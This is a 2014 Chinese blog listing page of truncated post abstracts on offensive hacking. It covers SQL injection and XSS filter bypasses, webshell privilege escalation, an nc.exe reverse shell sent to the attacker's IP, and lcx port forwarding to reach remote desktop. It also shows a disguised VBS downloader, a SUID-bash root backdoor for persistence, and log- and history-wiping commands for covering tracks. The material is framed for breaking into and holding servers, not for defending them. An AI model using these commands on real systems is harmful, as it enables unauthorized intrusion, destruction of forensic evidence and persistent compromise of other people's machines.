2014年3月15日
摘要: DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能反应或访问的是假网址。 DNS(域名劫持)是把网络地址(域名,以一个字符串的形式)对应到真实的计算机能够识别的网络地址(IP地址),以便计算机能够进一步通信,传递网址和内容等。由于域名劫持往往只能在特定的被劫持的网络范围内进行,所以在此范围外的域名服务器(DNS)能够返回正常的IP地址,高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持通常相伴的措施——封锁正常DNS... 阅读全文
posted @ 2014-03-15 17:07 milantgh 阅读(941) 评论(0) 推荐(0) 编辑
摘要: rm -f -r /var/log/*rm .bash_historyrm recently_used 阅读全文
posted @ 2014-03-15 16:40 milantgh 阅读(536) 评论(0) 推荐(0) 编辑
摘要: mysql会给出我们最近执行的SQL命令和脚本;同linux command保存在~/.bash_history一样,你用mysql连接MySQL server的所有操作也会被记录到~/.mysql_history文件中,这样就会有很大的安全风险了,如添加MySQL用户的sql也同样会被明文记录到此文件中。1,查看你系统的~/.mysql_history隐藏文件(我的测试环境下,一般linux的mysql用户来管理,所以在/home/mysql目录下会有这个文件)-bash-3.2$ ls -al | grep mysql_-rw------- 1 mysql mysql 5006 Apr 1 阅读全文
posted @ 2014-03-15 16:38 milantgh 阅读(6136) 评论(0) 推荐(0) 编辑
摘要: Windows的日志文件通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT;安全日志文件:%systemroot%\system32\config\SecEvent.EVT;系统日志文件:%systemroot%\system32\config\SysEvent.EVT;DNS日志默认位置:%sys temroot%\system32\config,默认文件大小512KBInternet信息服务FTP日志默认位置:%systemroot%\system32\l 阅读全文
posted @ 2014-03-15 16:27 milantgh 阅读(6891) 评论(0) 推荐(0) 编辑
摘要: 0×01 你要知道目前有哪些数据库微软公司旗下的:Microsoft SQL server 简称 MS-SQL 或者 SQL SERVER (大型数据库操作,功能和性能异常强大)(一般也是ASP或者ASP.NET)access,微软Office系列产品之一,极小型数据库。功能和性能当然也是相当一般。性能甚至可以说是相当低(常与ASP应用交互)Oracle公司旗下的:MySQL 是一个关系型数据库管理系统(常与PHP web应用交互)Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统Apache旗下的:MySql0&# 阅读全文
posted @ 2014-03-15 16:00 milantgh 阅读(4003) 评论(0) 推荐(0) 编辑
摘要: 1、iconv函数原型string iconv ( string $in_charset , string $out_charset , string $str )in_charset:输入的字符集out_charset:输出的字符集str:要转换的字符串具体查看php手册:http://www.php.net/manual/zh/function.iconv.php2、iconv导致字符串截断iconv在字符编码转换时可能导致字符串截断。当$str中有一个字符不能被目标字符集所表示时,str 从第一个无效字符开始截断并导致一个 E_NOTICE。例如:$d = iconv(“UTF-8″, 阅读全文
posted @ 2014-03-15 15:48 milantgh 阅读(1914) 评论(0) 推荐(0) 编辑
摘要: 0×00 简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric ( mixed $var )如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。0×01 函数是否安全接下来我们来看个例子,说明这个函数是否安全。$s = is_numeric($_GET['s'])?$_GET['s']:0;$sql="insert into test(type)values($s);";//是 values($s) 不是values('$s 阅读全文
posted @ 2014-03-15 15:45 milantgh 阅读(6155) 评论(0) 推荐(0) 编辑
摘要: 反射xss利用方法,绕过IE XSS Filter假设 1.php页面代码如下:echo $_GET['str'];使用IE浏览器访问该页面1.php?str=由于xss filter渲染 导致XSS不成功接下来我们要这么绕过呢?如果该站点 可以发帖、友情链接等等 只要能发链接地址其实不只发链接 嘿嘿。由于IE XSS FILTER 只是检测 referer 是否来自本源,如果来自本源 则 Ie XSS FILTER则不生效。你现在明白了吧在javascript: date: 等协议无效的情况下:">求友情链接IE用户点击即可中招(其他部分浏览器也中招) 阅读全文
posted @ 2014-03-15 15:41 milantgh 阅读(673) 评论(0) 推荐(0) 编辑
摘要: 由于编辑文章的模板参数 typeid2可控,导致存储XSS发生。dedecms/dede/templets/article_edit.htm页面316-325行代码如下: 文章副栏目: ' style='width:200px;' /> , 'typeid2', '')" alt='选择副栏目' title='选择副栏目' /> 从上面可以看出,变量$channelid 与 $arcRow['typeid2'] 只要可控... 阅读全文
posted @ 2014-03-15 15:37 milantgh 阅读(694) 评论(0) 推荐(0) 编辑
摘要: (一)针对网站程序,不考虑服务器。一、查找注入,注意数据库用户权限和站库是否同服。二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0、Apache等。四、查找编辑器,比较典型的ewebeditor、fckeditor等等。五、查找phpmyadmin等管理程序,可以尝试弱口令,或者寻找其漏洞。六、百度、谷歌搜索程序公开漏洞。七、猜解文件,如知道某文件为admin_login.php,我们可尝试admin_add.php、admin_ 阅读全文
posted @ 2014-03-15 15:02 milantgh 阅读(1343) 评论(0) 推荐(0) 编辑
摘要: Server-U等都不可以用的情况下. 一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去2:然后本地执行nc -vv -lp 52进行反弹3:在shell命令下执行F:\wwwroot\img\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.5:直接 阅读全文
posted @ 2014-03-15 14:28 milantgh 阅读(10997) 评论(0) 推荐(0) 编辑
摘要: 一、适用条件 1.目标系统是Windows(Win2000,XP,Win2003); 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 3.有mysql账号密码 二、导出udf MYSQL 5.1以下版本导出路径 阅读全文
posted @ 2014-03-15 14:10 milantgh 阅读(1409) 评论(0) 推荐(0) 编辑
摘要: cmd:执行命令的载体cmdshelllcx:端口映射工具1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器nc:监听工具A:基本用法1.连接到REMOTE主机格式:nc.exe -nvv 192.168.2.2 80讲解:连到192.168.2.2的TCP80端口2. 阅读全文
posted @ 2014-03-15 14:04 milantgh 阅读(2609) 评论(0) 推荐(1) 编辑
摘要: 1.端口映射解决内网提权步骤:1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器在webshell上执行lcx,实现端口转发:for example:lcx.exe -slave 127.0.0.1 51 192.168.2.2 3389使用工具:cmd.exe lc. 阅读全文
posted @ 2014-03-15 12:54 milantgh 阅读(652) 评论(0) 推荐(0) 编辑
摘要: vbs下载者:011:0203echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs0405echo sGet.Mode = 3 >>c:\windows\cftmon.vbs0607echo sGet.Type = 1 >>c:\windows\cftmon.vbs0809echo sGet.Open() >>c:\windows\cftmon.vbs1011echo sGet.Write(xPost.responseBody) >> 阅读全文
posted @ 2014-03-15 12:25 milantgh 阅读(1308) 评论(0) 推荐(0) 编辑
摘要: 旁站路径问题:1、读网站配置。2、用以下VBS:01On Error Resume Next0203If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then0405MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"0607WScr 阅读全文
posted @ 2014-03-15 12:23 milantgh 阅读(1526) 评论(0) 推荐(0) 编辑
摘要: pcAnywhere提权:1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users用户的目录权限,只剩下administer和system用户目录权限,则无法提权;2.在webshll的大马中查找到pcanywhere目录里的host目录,里面的cif文件保存了连接pcanywhere的账户和密码,然后下载下来,通过PcAnywhere密码破解工具进行破解密码,然后再自己的电脑上安装pcanywhere,然后通过连接到另一台电脑进行远程桌面连接;——————————–利用HASH 阅读全文
posted @ 2014-03-15 11:48 milantgh 阅读(6463) 评论(0) 推荐(0) 编辑
摘要: 前提:你现在已经是root用户, 想留一个后门以便日后再一次进入。系统环境:1dawg:~# uname -a2Linux dawg 2.4.20-1-386#3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux1. SUID shell关于SUID位的知识,请点这里首先, 先切换成为root用户,并执行以下的命令:1dawg:~# cp /bin/bash /.woot2dawg:~# chmod 4755 /.woot3dawg:~# ls -al /.woot4-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /. 阅读全文
posted @ 2014-03-15 11:39 milantgh 阅读(3836) 评论(0) 推荐(0) 编辑
摘要: 本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。Linux 系统下的一些常见路径:001/etc/passwd002003/etc/shadow004005/etc/fstab006007/etc/host.conf008009/etc/motd010011/etc/ld.so.conf012013/var/www/htdocs/index.php014015/var/www/conf/httpd.conf016017/var/www/htdocs/index.html018019/var/httpd/conf/php 阅读全文
posted @ 2014-03-15 11:23 milantgh 阅读(1771) 评论(0) 推荐(0) 编辑
摘要: 1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限)2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接)3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解)4,SAM提权(SAM系统帐户,通常需要下载临时存放的SAM文件,然后进行HASH破解)5,NC提权(利用NC命令,反弹一个端口,然后TELNET远程去连接一个端口,虽然权限不够大,但结合巴西烤肉,也是能够成功的)6,PR提权(PR提权,这个就不多说了,最好是免杀的PR大杀器,这样更方面我们去操作)7,IIS提权 阅读全文
posted @ 2014-03-15 11:03 milantgh 阅读(6070) 评论(0) 推荐(0) 编辑